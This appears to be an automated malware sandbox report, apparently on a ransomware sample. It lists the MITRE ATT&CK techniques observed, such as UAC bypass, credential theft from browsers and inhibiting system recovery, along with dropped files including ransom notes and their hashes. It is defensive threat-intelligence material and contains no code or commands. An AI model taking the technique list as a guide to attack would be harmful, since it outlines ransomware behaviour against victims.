                                                                                                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                                                                                                        Direct Volume Access

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1006

                                                                                                                                                                                                                                                                                                                                        Hide Artifacts

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1564

                                                                                                                                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1564.001

                                                                                                                                                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1562

                                                                                                                                                                                                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1562.004

                                                                                                                                                                                                                                                                                                                                        Disable or Modify Tools

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1562.001

                                                                                                                                                                                                                                                                                                                                        Safe Mode Boot

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1562.009

                                                                                                                                                                                                                                                                                                                                        Indicator Removal

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1070

                                                                                                                                                                                                                                                                                                                                        File Deletion

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1070.004

                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                                                                                                        Credentials from Password Stores

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1555

                                                                                                                                                                                                                                                                                                                                        Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1555.003

                                                                                                                                                                                                                                                                                                                                        Windows Credential Manager

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1555.004

                                                                                                                                                                                                                                                                                                                                        Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                        T1552

                                                                                                                                                                                                                                                                                                                                        Credentials In Files

                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                        T1552.001

                                                                                                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1120

                                                                                                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1018

                                                                                                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                                                                                                        8
                                                                                                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                                                                                                        System Location Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1614

                                                                                                                                                                                                                                                                                                                                        System Language Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1614.001

                                                                                                                                                                                                                                                                                                                                        System Network Configuration Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1016

                                                                                                                                                                                                                                                                                                                                        Internet Connection Discovery

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1016.001

                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                        Lateral Movement

                                                                                                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                                                                                                        Exfiltration

                                                                                                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                                                                                                        Defacement

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1491

                                                                                                                                                                                                                                                                                                                                        Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1490

                                                                                                                                                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1489

                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                        • C:\$Recycle.Bin\HYEOAMLLU-MANUAL.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          347d1f5d2135d5a57259b1890b860106

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          50b9247e086e78c962d950bdab0ea27c78ac8ebf

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          8e10cca1321da1a5b5ea97774a80bce1adf62f7b4c0735842ace73d5c04c0ca1

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          c8b3d5a443eee92363dfaef6ec76a095da12a7e451b09fb3362236f6d7c1444116de26ebda77541e72eaa05b52ad55d91450967ba54e28fc1cf77a1971602b67

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          50KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          fc4402cb79b9037cc92e997d16f5f835

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          3ce71043a2d70b6d5f0b98b8a34061e9612a2474

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          48e2a8c9386bf3dbfc55479c9f0cd731e4ec7c668ba3a0c5cbadd7aa528ea28b

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d00da7ca60064679b2de1719dfd7345a515ff7f0aec539c6dc75f782bd728fb8c73120d4927ca2b35e4893785f5964365d03e3c493dfd7080bc2180f81f1e70d

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e92909e5b5eccbcc7fa5087b5468aa1c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2135fb38ce723ac0a41a0a69abb0a7091badfff3

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          1329ca3829ff9cf7165c50ba923b3de06cd78f188cb09fd00e13a7faf1d0fc63

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e76ba4cb943177b00537d5f69a2735392fad93d40496de59acb2f42326944b2d21f94706ae455105e44b3223af45345241377bc0f543b39736380aa5d5a6aea1

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          2b89b515bdaf31c0234b6665d0b129b0

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          867f683d3f7ed053f0ed336871f62969a4c4e3ae

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          b4286e57f9004e78acb3ed39a19a5be1fed750ab2150e0ef2e53c94388961e3a

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          fc0366807e9c03417718709608b5f689cea47e255b9cb0e131b524c2e737c56b62c8ec127c8384ae2f8f690e41c4adff667df74a05bee780b9cabcc073340dde

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\!!_FILES_ENCRYPTED_.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          15494e30e578f1a70901d6fd6d8069c9

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          d9961b079f382a04f538fdd49491c30726397f65

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4fa99acedeb239db201fb1f4343ee3efdd1f8cde9337b1a993c715ed98360721

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          513a39e9165a02d87597088ccbe4aa2746a5714425214dcdfc68e0f575d5736afdf2e8541362317e4ff7a66ed26ac3c0690a1e297cb687e5de13d21a1d1ff00b

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Advanced JPG to PDF Free\AdvancedJPGtoPDFFree.exe
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e73e7c6d3ae01ed1deb0e1d277b39c98

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          03455d493a86bea7c03a01ba296fb7992a780fe6

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          be294295b34ed32bd9cc7eafda065b53fb86fb273d6c69af5365b06499a0e828

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          2f5aecd1b08175796acf55c45cf9e71aa49b56641bb93d63ce5c7cde6444e72c6ba02921773eecbe9d207bb8e55aa33e974fa8f0c1422a0f2228ff2f51451281

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Advanced JPG to PDF Free\iecore.dll
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          459B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f8aca6e17d9a12a9681f4e147fe44939

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          a27770117368635a49da390976f219b749ce4031

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          e5ecaca26263c7ac8cc851f3f3bf0cde69e81a4e850f189e280c5d623190db5a

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          efed654d5f095b324e2e6c543e491c95edf73b9204982e69576fa4eaacbba8ecf1b5ddb6dc8daa23e4c1c6fa1da9ca050601fa109a4edcb551b6e92fac8fa6ab

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Advanced JPG to PDF Free\ievision.dll
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          7.4MB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          bf9c166f1fe11e34bee3679fd29c6646

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          43ac9250302b0961a71e91384383e21987bae3ea

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          52aa5ed6011b3efd9f2fe920a80d43158da968f02ec984b80fa1e696623613d7

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          5857b1bf6dc825aa011ce052d9580912c07e9701bba6aa0ce264c4c520f85d22db7c4eab618f4b07effc00fa0976eba817d186e537b4c3a7260213a2de51cbbe

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          f205b07e5f3da94da8e7dbe81877150c

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          8af3cd604d4691227982ed0b236e07410ee30623

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          125e499be7efe43ba69f361252cfb8c1586c26ca6850aa2b4a07939ee399d90f

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          e29adf6934f365ffc8aa2f04c9b680ccbcddc384bcbe789d34ec7727a3208de99ae89ed4bbed7522e5d8946cf768120be187c63f83c8b3b7e32d200d3cee856f

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jdk-1.8\bin\vjavaws.ico
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          38b41d03e9dfcbbd08210c5f0b50ba71

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          2fbfde75ce9fe8423d8e7720bf7408cedcb57a70

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          611f2cb2e03bd8dbcb584cd0a1c48accfba072dd3fc4e6d3144e2062553637f5

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          ec97556b6ff6023d9e6302ba586ef27b1b54fbf7e8ac04ff318aa4694f13ad343049210ef17b7b603963984c1340589665d67d9c65fec0f91053ff43b1401ba9

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          153B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          fa122a733af2fb2398da9892658fafd5

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          1dd6c54cdc63c973e1212dbce06803040af7bad3

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          38993f6018cffba26b28a865e52560531052b3e3cf858980f3260c199aae4710

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cadc0e64c4c6481b769bc2bec1d2b45b3dfa5ddb988de2aa9cc5f8ce6bb41f485e84f9ea6e9aa47295d4ad50b113ebc450f9fd4a9230bb3d1e9b1bc037994cb0

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          190B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          6d3c3f3b8d78a6a486ec5eade9c83dd7

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          e533f6f25546dafd16d2531394347616a8304328

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          d2fb44494605dcaf6798f0ae9dc6c59014c2c67eea704e289b7711b423e9fafc

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          2b68d7e6a22742adde058e4214b14130d2be0cafb28778117f1d375d2e7f41d665fb68718b307c35ee3661564711b03d50136471588e8b6659a83a34333b4c4e

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          190B

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e8f632f59756de4cc812792aa74cd3d9

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          d7c7aa5a4fdcec273c15285830b098d92c4ada18

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          f882745965104a1c181939b79df225cebc6079f4887a2d1540ff8cdf39b6ef59

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d53b6cccaabecc1533ec9e4a7ff861511980b40340b0833e1105c9673cecac2186d84717c702ab7e7895392b62ab25042071a44273fe8e25500cccd5f24704e6

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\directshow.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          eb971e3ace1f5b163001e49034408b33

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          4dad532f520fe62b3fefc267b7c19bd4be06458a

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          b136ee975f1145769355203d7f5615323d765c855f621f93c90bdb33b4aff566

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          cb283a9bf5319d960c9b79be4f75ca1fedfd7f2de06f68585fc860d3a74ea554e8731d40429b41d67946d89548837f015446a5536d7c508e86b124ee87f0b2c4

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\glib.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          31KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          70bb5638e11583acfeb9ab9ec8ab59cf

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          4eb984b18cc58e203c466dce5c9ddc21c28a49ec

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          11c38e0ee0e231db4dea8456ca1ff4ecaec604800ea48322677d21d59976a843

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          0afb89a8848a33fa7bbf74fe2e8b060813970b3ee92e5015c7083892ae5d78c217a8ce41f3412f6694fffbf68b42c2fb233ca34439280e7e1c8a1ed3bad8f291

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          34KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          39d6a5c6ac32c11f98d42eafe59242df

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          e5cad26758574eea330681349da4bad18810a809

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          832616c537fdf164fefc9560afeb322038c810e8553316fe27da22f159363cf2

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          471eab9db380a9a5236546cf7528f3853cbf07c7493de34ea83480811c452b0cf8b465c939182ba16c744631671a81e4564256a6f7ccc9cebdb20e6cbb2682a0

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          23KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          0cc4c62199466aa8be61112f05e42bb6

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          c8fcb75f7fbf9dd1621e185c7e72754fe9b8cc03

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          131f3b200d2e44d146814c23cb24748d46305da364cf75fa2ed86dc5d2beacfe

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          d30eb9ac468ec7c19f2ff9d85ff5897df0aaa5f2f7ba3ca0d06da4efefc2d413249b0e951dfaf433dc0d7bbf4d846d88f9bc8339a832f3967724731fed98bf6a

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\jpeg_fx.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          cebf7d5a6aed63b6b748f20bf85183a9

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          57debccc18c3560eebebf4d99cb79761a39d8b27

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          d60ecf98997da2cf78e14c3d19a5e9cf732a07163b0d4c6d1aaf9c75b440f37d

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          30f2445e1709ebbb55a15b2d94cad2611f3ce3f4f37787e01ef69b34cf5743e15b77464e460945971e80edb947c6e6ecde354b702e703b861e4c1fd6f27691ff

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          e35ba404cc2958a11215c0ca057092c2

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          53cf331629ca4e08e79aaa6ad266b98ef7b46536

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          df08589c773d0428c9870129fc1f210960f0ea6e581196c0e6d43ca703f16674

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          21bab43bd903cb4a665946ed7af89a39ebb1d4574916462256c94eb8035916d8b9986f45cc940d5662e80d4eb8e40fa1b71cb8b5f0058d2174a46b06429f5927

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\libxml2.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          af7ea3ed9a67d93d89b68adc1ee18316

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          6585268e30b77add981c67e31add14459c336664

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          c4c178e9605b7789a9fc55a9954eb4506c66f29ca62c0ef729930262f7f0fa7c

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          fb587dc072cb5c77de5d067ae5dcea11d36afb2a87137c511ffcaa961beaec8c9a0ed20c5a2005bb3deb56bd40092d2c6976534f79d8da36ad41ccdf4070cec5

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\libxslt.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          fd673c8ca2f22daeaf2922bc026c4ee5

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          ef8a7a82a774a250e6688d073ed0aa194799b26d

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          5afeb8119111a0811cfac84afe7f4afb18860211240143d8b7107b757d7aeeeb

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          4bd5ec258dda8cce799859655e402a077b8b4cbeac5e6553f6aeb4c34ecc0943e73c570c47821f7cc3b8ea0a456732d3f7ed793e78ef4e6095777c19953761a7

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\mesa3d.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          50346febe81372b26ab8f3f0ae2641dd

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          8e86e5b3c7380af7916604a9bdb9fe2e23ee0567

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          4d4beda277e21e0612af90da1e48261cfdc842ae16a88f87da660b17ebf2b6b6

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          9a1aaf98e7d7451afc05896cbe35e52aa5855f684d77de249cc81c9f4cf4dca59821f18b89f25cf44ca3770a75889d4f8a9d7113696b1d13c40089d270f1ccf9

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\public_suffix.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          17KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          1de23aac9ca42343fa1fd76fd5d7093f

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          9608d14e962bef8b671eb2c25c43e0cc19b6b0e7

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          81b7e05249c25b285a9a80d737bc286bdd908901b987f13474b6942220142a36

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          5bc791aeb978c2ebf59d3a8e5754c6ad50584bc2b89068c1544bc1de428ce42eef60d571fd3a356e5c3625ec8e0e6e014b738711f230d0a0be8cb4055243310f

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          320KB

                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                          c8342b0c126234253721006d291f13b7

                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                          b373b20ae5d235c3ab3ea68b590a28cc3ba73012

                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                          1d0e23caa65f54fdbe1de5926ceb735dda6c88ebb5a28962fd44530b31f31cd3

                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                          8f469a78393bc1c4ba56d8d94afe87374202356bd1b613c7abd12859c25e62827435c567cd5297c2cde9d0e35dd97efe810eeb07b8aa21b47308bac16f267242

                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Java\jre-1.8\legal\jdk\asm.md
